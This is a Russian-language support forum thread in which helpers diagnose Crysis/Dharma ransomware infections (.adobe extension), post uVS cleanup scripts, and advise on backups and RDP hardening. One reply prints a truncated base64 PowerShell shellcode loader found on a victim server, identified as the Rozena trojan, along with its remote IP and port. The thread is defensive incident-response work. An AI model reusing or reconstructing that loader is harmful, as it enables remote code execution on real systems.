файлы зашифрованы с расширением .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx;.santa; .bizer , Filecoder.Crysis / Encoder.3953; r/n: info.hta

RSS
на текущий момент известные варианты CrySis/Dharma, которые не могут быть расшифрованы в  вирлабе:

Цитата
   .cesar; .arena; .cobra; .java; .write; .arrow; .bip; .cmb/.combo; .brrr; .gamma; .monro; .bkp; .btc; .bgtx; .boost; .waifu; .FUNNY; .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx; .santa; .bizer

Ответы

@Сергей Зубков,

1. предполагаю, чтоб была взломана учетная запись USERS\BOCHARNIKOVA
именно из ее профиля был запуск шифратора.

%SystemDrive%\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE


Цитата
Полное имя                  C:\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE
Имя файла                   1ST.EXE
Тек. статус                 ВИРУС [Запускался неявно или вручную]
                           
Обнаруженные сигнатуры      
Сигнатура                   Win32/Filecoder.Crysis.L (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2017-08-18
                           
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
File_Id                     58B8AF7219000
Linker                      10.0
Размер                      94720 байт
Создан                      27.11.2018 в 01:48:19
Изменен                     10.11.2018 в 06:01:28

в настоящее время активности шифратора нет.                            

2. по очистке системы выполните:
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v4.1.1 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[STOPENCRYPT@QQ.COM].ADOBE
del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[STOPENCRYPT@QQ.COM].ADOBE
del %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[STOPENCRYPT@QQ.COM].ADOBE
delref %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\INFO.HTA
delref %Sys32%\INFO.HTA
del %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\INFO.HTA.TXT
delall %SystemDrive%\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\1ST.EXE
apply

QUIT

без перезагрузки, пишем о старых и новых проблемах.
------------

3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в support@esetnod32.ru
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
(вобщем здесь много работы для сист. админа, как защитить локальную сеть от внешних вторжений.)

6. версия антивирусной защиты 4.2.40.10  крайне устарела, скорее всего уже и нет поддержки по данной версии.

Цитата
ESET NOD32 Antivirus Business Edition
Version Release Date Latest build Updated Status Next Status Expected EOL
4 2-Mar-09 4.2.76.0 12-Jan-12 Basic Support                End of Life Dec 2018*

ESET Smart Security Business Edition
Version Release Date Latest build Updated Status Next Status Expected EOL
4 2-Mar-09 4.2.76.0 12-Jan-12 Basic Support                 End of Life Dec 2018*

Есть специализированные продукты ESET для серверов: ESET File Security v6 и v7
переустановите антивирусный клиент на актуальную и специализированную версию.

7. поправил скрипт.
Спасибо  
Здравствуйте!
На Windows Server 2012 поймали шифровальщика в adobe (youneedfiles@india.com)

Зашифрованные файлы
Образ автозапуска
Цитата
Aleksandr Gordichuk написал:
Здравствуйте!
На Windows Server 2012 поймали шифровальщика в adobe ( youneedfiles@india.com )

Зашифрованные файлы
Образ автозапуска

по очистке системы выполните скрипт:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA
;------------------------autoscript---------------------------

del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[YOUNEEDFILES@INDIA.COM].ADOBE
del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[YOUNEEDFILES@INDIA.COM].ADOBE
delall %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA
delall %Sys32%\INFO.HTA
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE
addsgn A7679B1BB9DA4D720B132BD59A37ED05258AFC31CC061F7885C302F9A8D6714C237F43573E55F549CBC084F77AB749FA155F083255B230CC6D774CEEA8F9DDF0 8 Win32/Filecoder.Crysis.L 7

zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE
zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE
zoo %Sys32%\EX.EXE
chklst
delvir

delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[YOUNEEDFILES@INDIA.COM].ADOBE
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC
delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[YOUNEEDFILES@INDIA.COM].ADOBE
apply

deltmp
czoo
;-------------------------------------------------------------

QUIT

без перезагрузки, пишем о старых и новых проблемах.
------------
....
3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в support@esetnod32.ru
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.

6. обратите внимание на сетевую активность powershell
83.171.107.131:49157 <-> 185.224.249.30:9425
при этом выполняется закодированный в base64 скрипт.
Код
JABTAHQASQBwACAAPQAgACcAJABJAHAAYgBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEkAcABiAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4AGIAOAAsADAAeAA2ADQALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeAA4ADAALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGQALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADUALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGQALAAwAHgANwBjACwAMAB4ADkAMAAsADAAeABkAGYALAAwAHgAZgBlACwAMAB4ADcAYwAsADAAeAA2ADAALAAwAHgAOAAwACwAMAB4ADcANwAsADAAeAA5ADkALAAwAH

а так же обнаружен внедренный поток.

(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE [1828], tid=1972
По поводу очистки системы,  это мы удаляем сам вирус?
и пункт 6, можете пояснить,  я не понял  
Цитата
Aleksandr Lebowski написал:
По поводу очистки системы,  это мы удаляем сам вирус?
и пункт 6, можете пояснить,  я не понял  

да, судя по образу в системе был активен файл шифратора. в процессах:

Цитата
; Процессы

?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER.EXE
?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE
Win32/Filecoder.Crysis.L(64)| C:\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE
АКТИВЕН    | C:\PROGRAM FILES (X86)\RAID WEB CONSOLE 2\FRAMEWORK\VIVALDIFRAMEWORK.EXE

без очистки системы, новые файлы будут опять зашифрованы.

по п.6 powershell установил подключение с адресом:
NetRange:       185.0.0.0 - 185.255.255.255
City:           Amsterdam
Country:        NL

и выполняет закодированный скрипт. который кстати, детектируется антивирусом как
PowerShell/Rozena.AF троянская программа
----------
возможно, скрипт работает на майнинг.
после очистки системы скриптом uVS необходимо выполнить сканирование системы штатным антивирусом если не планируете восстановить систему до безопасной точки восстановления, или переустановить систему.

если антивирусная защита не установлена, необходимо установить антивирусный продукт. например. ESET File Security v 6 или 7
Спасибо за ответ )
наверное полностью все сносить будем
жаль что файлы не расшифровать  
Цитата
Aleksandr Lebowski написал:
Спасибо за ответ ) наверное полностью все сносить будем жаль что файлы не расшифровать  
да, сейчас не расшифровать.
на этот пункт обратите внимание.

Цитата
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
скорее всего был подобран пароль к какой либо учетной записи.
здравствуйте, вирус проник в базу 1с, в результате файлы стали .adobe

https://www.sendspace.com/file/j4r09c
Цитата
Роман Фадеев написал:
здравствуйте, вирус проник в базу 1с, в результате файлы стали .adobe

https://www.sendspace.com/file/j4r09c
@Роман Фадеев,

судя по образу автозапуска система уже очищена от вредоносных файлов шифратора.

по расшифровки .adobe, к сожалению, не сможем вам помочь, восстановление документов на текущий момент возможно,
только из архивных копий документов. (о которых не следует забывать в связи активностью шифраторов, и прочих катастроф)

в любом случае:

3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в support@esetnod32.ru
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

на будущее:
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
--------
злоумышленники, которые распространяют Crysis, как правило используют возможности получения доступа к RDP, путем взлома учетных записей на сервере.
Читают тему (гостей: 1)